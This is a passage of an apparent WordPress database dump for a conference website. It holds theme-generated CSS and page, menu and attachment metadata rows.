#ffffff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-links-container a:hover > span {\r\n  color: #ffffff;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title,\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.owl-carousel .entry-title {\r\n  margin-bottom: 5px;\r\n  font-size: 22px;\r\n  line-height: 32px;\r\n  font-style: ;\r\n  font-weight: bold;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta * {\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .portfolio-categories {\r\n  margin-bottom: 15px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\r\n  margin-bottom: 5px;\r\n  font-style: ;\r\n  font-weight: ;\r\n  text-transform: ;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list) .post-entry-content {\r\n  padding: 20px 30px 30px 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\r\n  padding: 0;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\r\n  background: #f7f7f7;\r\n  -webkit-box-shadow: none;\r\n  box-shadow: none;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.gradient-overlay-layout-list .post-entry-content {\r\n  border-radius: 0px;\r\n}\r\n@media screen and (max-width: ) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 article {\r\n    -webkit-flex-flow: column nowrap;\r\n    -moz-flex-flow: column nowrap;\r\n    -ms-flex-flow: column nowrap;\r\n    flex-flow: column nowrap;\r\n    margin-top: 20px;\r\n  }\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.dividers-on article {\r\n    border: none;\r\n  }\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.content-bg-on.centered-layout-list article {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap,\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\r\n    width: 100%;\r\n    margin: 0;\r\n    top: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-thumbnail-wrap {\r\n    padding: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content:after {\r\n    display: none;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .project-even .post-thumbnail-wrap,\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-thumbnail-wrap {\r\n    -webkit-order: 0;\r\n    -moz-order: 0;\r\n    -ms-flex-order: 0;\r\n    order: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-title-content {\r\n    -webkit-order: 1;\r\n    -moz-order: 1;\r\n    -ms-flex-order: 1;\r\n    order: 1;\r\n    width: 100%;\r\n    padding: 20px 20px 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.centered-layout-list .post-entry-content {\r\n    -webkit-order: 2;\r\n    -moz-order: 2;\r\n    -ms-flex-order: 2;\r\n    order: 2;\r\n    padding-top: 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-entry-content {\r\n    padding: 20px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-title {\r\n    margin: 3px 0 5px;\r\n    font-size: 20px;\r\n    line-height: 26px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-meta {\r\n    margin: 5px 0 5px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .entry-excerpt {\r\n    margin: 15px 0 0;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details {\r\n    margin: 5px 0 10px;\r\n  }\r\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0 .post-details.details-type-link {\r\n    margin-bottom: 2px;\r\n  }\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\r\n  grid-row-gap: 30px;\r\n  grid-column-gap: 30px;\r\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid {\r\n  display: flex;\r\n  flex-flow: row wrap;\r\n  margin: -15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\r\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\r\n  flex: 1 0 ;\r\n  min-width: ;\r\n  max-width: 100%;\r\n  padding: 15px;\r\n  box-sizing: border-box;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n  grid-template-columns: repeat(3,1fr);\r\n  grid-template-rows: auto;\r\n  grid-column-gap: 30px;\r\n  grid-row-gap: 30px;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .double-width {\r\n  grid-column: span 2;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n  margin: -15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n  width: 33.333333333333%;\r\n  padding: 15px;\r\n}\r\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n  width: calc(33.333333333333%) * 2;\r\n}\r\n.portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\r\n  grid-row-gap: 0px;\r\n}\r\n@media screen and (max-width: 1199px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(3,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 33.333333333333%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(33.333333333333%)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 991px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(2,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 50%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(50%)*2;\r\n  }\r\n}\r\n@media screen and (max-width: 767px) {\r\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid {\r\n    grid-template-columns: repeat(1,1fr);\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell {\r\n    width: 100%;\r\n  }\r\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\r\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-3cc32284caea53a2ca9240bef8250ab0.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\r\n    width: calc(100%)*2;\r\n  }\r\n}\r\n'),
(15869,2898,'_the7_imported_item','software-company'),
(15870,2898,'_dt_microsite_primary_menu','5'),
(15871,2898,'_dt_microsite_split_left_menu','5'),
(15872,2898,'_dt_microsite_split_right_menu','5'),
(15873,2898,'_dt_microsite_mobile_menu','5'),
(15874,2898,'_dt_page_overrides_right_margin',''),
(15875,2898,'_dt_page_overrides_left_margin',''),
(15876,2898,'_dt_mobile_page_padding_top',''),
(15877,2898,'_dt_mobile_page_padding_right',''),
(15878,2898,'_dt_mobile_page_padding_bottom',''),
(15879,2898,'_dt_mobile_page_padding_left',''),
(15880,2898,'_thumbnail_id','2288'),
(15881,2898,'_dt_fancy_header_layout_heading',''),
(15882,2898,'_dt_fancy_header_title_aligment','center'),
(15883,2898,'_dt_fancy_header_height','300'),
(15884,2898,'_dt_fancy_header_padding-top','0px'),
(15885,2898,'_dt_fancy_header_padding-bottom','0px'),
(15886,2898,'_dt_fancy_header_breadcrumbs_heading',''),
(15887,2898,'_dt_fancy_header_breadcrumbs','disabled'),
(15888,2898,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(15889,2898,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(15890,2898,'_dt_fancy_header_title_heading',''),
(15891,2898,'_dt_fancy_header_title_mode','custom'),
(15892,2898,'_dt_fancy_header_title','International Science Committee'),
(15893,2898,'_dt_fancy_header_title_font_size','30'),
(15894,2898,'_dt_fancy_header_title_line_height','36'),
(15895,2898,'_dt_fancy_header_text_transform','none'),
(15896,2898,'_dt_fancy_header_title_color_mode','color'),
(15897,2898,'_dt_fancy_header_title_color','#ffffff'),
(15898,2898,'_dt_fancy_header_subtitle_heading',''),
(15899,2898,'_dt_fancy_header_subtitle',''),
(15900,2898,'_dt_fancy_header_subtitle_font_size','18'),
(15901,2898,'_dt_fancy_header_subtitle_line_height','26'),
(15902,2898,'_dt_fancy_header_subtitle_text_transform','none'),
(15903,2898,'_dt_fancy_header_subtitle_color_mode','color'),
(15904,2898,'_dt_fancy_header_subtitle_color','#ffffff'),
(15905,2898,'_dt_fancy_header_bg_heading',''),
(15906,2898,'_dt_fancy_header_bg_color','#222222'),
(15907,2898,'_dt_fancy_header_bg_image_origin','custom'),
(15908,2898,'_dt_fancy_header_bg_image','a:0:{}'),
(15909,2898,'_dt_fancy_header_bg_repeat','no-repeat'),
(15910,2898,'_dt_fancy_header_bg_position_x','center'),
(15911,2898,'_dt_fancy_header_bg_position_y','center'),
(15912,2898,'_dt_fancy_header_bg_fullscreen','1'),
(15913,2898,'_dt_fancy_header_bg_overlay','0'),
(15914,2898,'_dt_fancy_header_overlay_color','#000'),
(15915,2898,'_dt_fancy_header_bg_overlay_opacity','50'),
(15916,2898,'_dt_fancy_header_scroll_effect','default'),
(15917,2898,'_dt_fancy_header_bg_parallax','0.5'),
(15918,2898,'_dt_fancy_header_responsiveness_heading',''),
(15919,2898,'_dt_fancy_header_responsiveness','enabled'),
(15920,2898,'_dt_fancy_header_responsiveness_switch','778px'),
(15921,2898,'_dt_fancy_header_responsive_height','70'),
(15922,2898,'_dt_fancy_header_responsive_font_size','30'),
(15923,2898,'_dt_fancy_header_responsive_title_line_height','38'),
(15924,2898,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(15925,2898,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(15926,2898,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(15927,2898,'the7_fancy_title_css','.fancy-header {\r\n  background-image: none;\r\n  background-repeat: no-repeat;\r\n  background-position: center center;\r\n  background-size: cover;\r\n  background-color: #222222;\r\n}\r\n.mobile-false .fancy-header {\r\n  background-attachment: scroll;\r\n}\r\n.fancy-header .wf-wrap {\r\n  min-height: 300px;\r\n  padding-top: 0px;\r\n  padding-bottom: 0px;\r\n}\r\n.fancy-header .fancy-title {\r\n  font-size: 30px;\r\n  line-height: 36px;\r\n  color: #ffffff;\r\n  text-transform: none;\r\n}\r\n.fancy-header .fancy-subtitle {\r\n  font-size: 18px;\r\n  line-height: 26px;\r\n  color: #ffffff;\r\n  text-transform: none;\r\n}\r\n.fancy-header .breadcrumbs {\r\n  color: #ffffff;\r\n}\r\n.fancy-header-overlay {\r\n  background: rgba(0,0,0,0.5);\r\n}\r\n@media screen and (max-width: 778px) {\r\n  .fancy-header .wf-wrap {\r\n    min-height: 70px;\r\n  }\r\n  .fancy-header .fancy-title {\r\n    font-size: 30px;\r\n    line-height: 38px;\r\n  }\r\n  .fancy-header .fancy-subtitle {\r\n    font-size: 20px;\r\n    line-height: 28px;\r\n  }\r\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\r\n    display: none;\r\n  }\r\n  #fancy-header > .wf-wrap {\r\n    flex-flow: column wrap;\r\n    align-items: center;\r\n    justify-content: center;\r\n    padding-bottom: 0px !important;\r\n  }\r\n  .fancy-header.title-left .breadcrumbs {\r\n    text-align: center;\r\n    float: none;\r\n  }\r\n  .breadcrumbs {\r\n    margin-bottom: 10px;\r\n  }\r\n  .breadcrumbs.breadcrumbs-bg {\r\n    margin-top: 10px;\r\n  }\r\n  .fancy-header.title-right .breadcrumbs {\r\n    margin: 10px 0 10px 0;\r\n  }\r\n  #fancy-header .hgroup,\r\n  #fancy-header .breadcrumbs {\r\n    text-align: center;\r\n  }\r\n  .fancy-header .hgroup {\r\n    padding-bottom: 5px;\r\n  }\r\n  .breadcrumbs-off .hgroup {\r\n    padding-bottom: 5px;\r\n  }\r\n  .title-right .hgroup {\r\n    padding: 0 0 5px 0;\r\n  }\r\n  .title-right.breadcrumbs-off .hgroup {\r\n    padding-top: 5px;\r\n  }\r\n  .title-left.disabled-bg .breadcrumbs {\r\n    margin-bottom: 0;\r\n  }\r\n}\r\n'),
(15928,2898,'rs_page_bg_color',''),
(15929,2898,'_dp_is_rewrite_republish_copy','1'),
(15930,2876,'_dp_has_rewrite_republish_copy','2898'),
(15931,2898,'_dp_creation_date_gmt','2022-10-19 04:33:51'),
(15932,2898,'_edit_lock','1666154033:1'),
(15933,2898,'_edit_last','1'),
(15934,2904,'_menu_item_type','custom'),
(15935,2904,'_menu_item_menu_item_parent','2351'),
(15936,2904,'_menu_item_object_id','2904'),
(15937,2904,'_menu_item_object','custom'),
(15938,2904,'_menu_item_target',''),
(15939,2904,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(15940,2904,'_menu_item_xfn',''),
(15941,2904,'_menu_item_url','https://gsw2023.com/index.php/isc/'),
(15943,2083,'_wp_old_date','2022-10-13'),
(15944,2346,'_wp_old_date','2022-10-13'),
(15945,2348,'_wp_old_date','2022-10-13'),
(15946,2349,'_wp_old_date','2022-10-13'),
(15947,2350,'_wp_old_date','2022-10-13'),
(15948,2351,'_wp_old_date','2022-10-13'),
(15949,2084,'_wp_old_date','2022-10-13'),
(15950,2352,'_wp_old_date','2022-10-13'),
(15951,2281,'_wp_old_date','2022-10-13'),
(15952,2353,'_wp_old_date','2022-10-13'),
(15953,2354,'_wp_old_date','2022-10-13'),
(15954,2355,'_wp_old_date','2022-10-13'),
(15955,2282,'_wp_old_date','2022-10-13'),
(15956,2283,'_wp_old_date','2022-10-13'),
(15957,2284,'_wp_old_date','2022-10-13'),
(15958,2285,'_wp_old_date','2022-10-13'),
(15959,2356,'_wp_old_date','2022-10-13'),
(15960,2357,'_wp_old_date','2022-10-13'),
(15961,2359,'_wp_old_date','2022-10-13'),
(15962,2358,'_wp_old_date','2022-10-13'),
(15963,2286,'_wp_old_date','2022-10-13'),
(15964,2920,'_edit_lock','1679543091:1'),
(15965,2921,'_menu_item_type','post_type'),
(15966,2921,'_menu_item_menu_item_parent','2284'),
(15967,2921,'_menu_item_object_id','2920'),
(15968,2921,'_menu_item_object','page'),
(15969,2921,'_menu_item_target',''),
(15970,2921,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(15971,2921,'_menu_item_xfn',''),
(15972,2921,'_menu_item_url',''),
(15973,2920,'_edit_last','1'),
(15974,2920,'_wpb_vc_js_status','true'),
(15975,2920,'_dt_sidebar_position','disabled'),
(15976,2920,'_dt_sidebar_widgetarea_id','sidebar_1'),
(15977,2920,'_dt_sidebar_hide_on_mobile','0'),
(15978,2920,'_dt_footer_show','1'),
(15979,2920,'_dt_footer_widgetarea_id','sidebar_2'),
(15980,2920,'_dt_footer_hide_on_mobile','0'),
(15981,2920,'_dt_header_title','fancy'),
(15982,2920,'_dt_header_background','normal'),
(15983,2920,'_dt_header_background_below_slideshow','disabled'),
(15984,2920,'_dt_header_transparent_bg_color_scheme','light'),
(15985,2920,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(15986,2920,'_dt_header_transparent_top_bar_bg_opacity','25'),
(15987,2920,'_dt_header_transparent_bg_color','#000000'),
(15988,2920,'_dt_header_transparent_bg_opacity','50'),
(15989,2920,'_dt_header_disabled_background','normal'),
(15990,2920,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(15991,2920,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(15992,2920,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(15993,2920,'_dt_header_disabled_transparent_bg_color','#000000'),
(15994,2920,'_dt_header_disabled_transparent_bg_opacity','50'),
(15995,2920,'_dt_page_overrides_top_margin',''),
(15996,2920,'_dt_page_overrides_right_margin',''),
(15997,2920,'_dt_page_overrides_bottom_margin',''),
(15998,2920,'_dt_page_overrides_left_margin',''),
(15999,2920,'_dt_mobile_page_padding_top',''),
(16000,2920,'_dt_mobile_page_padding_right',''),
(16001,2920,'_dt_mobile_page_padding_bottom',''),
(16002,2920,'_dt_mobile_page_padding_left',''),
(16003,2920,'_dt_fancy_header_layout_heading',''),
(16004,2920,'_dt_fancy_header_title_aligment','center'),
(16005,2920,'_dt_fancy_header_height','400'),
(16006,2920,'_dt_fancy_header_padding-top','0px'),
(16007,2920,'_dt_fancy_header_padding-bottom','0px'),
(16008,2920,'_dt_fancy_header_breadcrumbs_heading',''),
(16009,2920,'_dt_fancy_header_breadcrumbs','disabled'),
(16010,2920,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(16011,2920,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(16012,2920,'_dt_fancy_header_title_heading',''),
(16013,2920,'_dt_fancy_header_title_mode','custom'),
(16014,2920,'_dt_fancy_header_title',''),
(16015,2920,'_dt_fancy_header_title_font_size','50'),
(16016,2920,'_dt_fancy_header_title_line_height','36'),
(16017,2920,'_dt_fancy_header_text_transform','uppercase'),
(16018,2920,'_dt_fancy_header_title_color_mode','color'),
(16019,2920,'_dt_fancy_header_title_color','#fcf411'),
(16020,2920,'_dt_fancy_header_subtitle_heading',''),
(16021,2920,'_dt_fancy_header_subtitle',''),
(16022,2920,'_dt_fancy_header_subtitle_font_size','18'),
(16023,2920,'_dt_fancy_header_subtitle_line_height','26'),
(16024,2920,'_dt_fancy_header_subtitle_text_transform','none'),
(16025,2920,'_dt_fancy_header_subtitle_color_mode','color'),
(16026,2920,'_dt_fancy_header_subtitle_color','#ffffff'),
(16027,2920,'_dt_fancy_header_bg_heading',''),
(16028,2920,'_dt_fancy_header_bg_color','#222222'),
(16029,2920,'_dt_fancy_header_bg_image_origin','featured_image'),
(16030,2920,'_dt_fancy_header_bg_image','a:0:{}'),
(16031,2920,'_dt_fancy_header_bg_repeat','no-repeat'),
(16032,2920,'_dt_fancy_header_bg_position_x','center'),
(16033,2920,'_dt_fancy_header_bg_position_y','center'),
(16034,2920,'_dt_fancy_header_bg_fullscreen','1'),
(16035,2920,'_dt_fancy_header_bg_overlay','0'),
(16036,2920,'_dt_fancy_header_overlay_color','#000'),
(16037,2920,'_dt_fancy_header_bg_overlay_opacity','50'),
(16038,2920,'_dt_fancy_header_scroll_effect','default'),
(16039,2920,'_dt_fancy_header_bg_parallax','0.5'),
(16040,2920,'_dt_fancy_header_responsiveness_heading',''),
(16041,2920,'_dt_fancy_header_responsiveness','enabled'),
(16042,2920,'_dt_fancy_header_responsiveness_switch','778px'),
(16043,2920,'_dt_fancy_header_responsive_height','70'),
(16044,2920,'_dt_fancy_header_responsive_font_size','30'),
(16045,2920,'_dt_fancy_header_responsive_title_line_height','38'),
(16046,2920,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(16047,2920,'_dt_fancy_header_responsive_subtitle_line_height','44'),
(16048,2920,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(16049,2920,'the7_fancy_title_css','.fancy-header {\n  background-image: url(\'https://gsw2023.com/wp-content/uploads/2022/11/esa.jpg\');\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 400px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 50px;\n  line-height: 36px;\n  color: #fcf411;\n  text-transform: uppercase;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 44px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(16050,2920,'_oembed_31fcf2bcd22dbe700c37a9ce5562d909','{{unknown}}'),
(16051,2920,'_oembed_6b8a10c65b506875ea20d188370bea35','{{unknown}}'),
(16052,2920,'_oembed_9407611df415d7c280f73016c308252f','{{unknown}}'),
(16053,2082,'_wp_old_date','2022-10-19'),
(16054,2083,'_wp_old_date','2022-10-19'),
(16055,2346,'_wp_old_date','2022-10-19'),
(16056,2348,'_wp_old_date','2022-10-19'),
(16057,2349,'_wp_old_date','2022-10-19'),
(16058,2350,'_wp_old_date','2022-10-19'),
(16059,2351,'_wp_old_date','2022-10-19'),
(16060,2904,'_wp_old_date','2022-10-19'),
(16061,2084,'_wp_old_date','2022-10-19'),
(16062,2352,'_wp_old_date','2022-10-19'),
(16063,2281,'_wp_old_date','2022-10-19'),
(16064,2353,'_wp_old_date','2022-10-19'),
(16065,2354,'_wp_old_date','2022-10-19'),
(16066,2355,'_wp_old_date','2022-10-19'),
(16067,2282,'_wp_old_date','2022-10-19'),
(16068,2283,'_wp_old_date','2022-10-19'),
(16069,2284,'_wp_old_date','2022-10-19'),
(16070,2285,'_wp_old_date','2022-10-19'),
(16071,2356,'_wp_old_date','2022-10-19'),
(16072,2357,'_wp_old_date','2022-10-19'),
(16073,2359,'_wp_old_date','2022-10-19'),
(16074,2358,'_wp_old_date','2022-10-19'),
(16075,2286,'_wp_old_date','2022-10-19'),
(16076,2928,'_wp_attached_file','2022/10/ext1.jpg'),
(16077,2928,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:632;s:6:\"height\";i:562;s:4:\"file\";s:16:\"2022/10/ext1.jpg\";s:8:\"filesize\";i:135870;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"ext1-300x267.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24527;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"ext1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8041;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(16078,2930,'_wp_attached_file','2022/10/ext11.jpg'),
